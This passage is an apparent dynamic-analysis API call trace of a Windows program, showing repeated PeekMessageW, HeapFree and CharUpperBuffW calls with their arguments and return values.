returned 1 [0145.404] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1478 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1478 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1478 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9750 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9738 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9768 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9780 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9720 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1448 | out: hHeap=0x25c0000) returned 1 [0145.404] lstrlenW (lpString="7C") returned 2 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9798 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1478 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a97b0 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96c0 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9690 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94e0 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96c0 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9690 | out: hHeap=0x25c0000) returned 1 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.405] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.405] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.406] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.407] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.408] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.409] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.410] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.410] 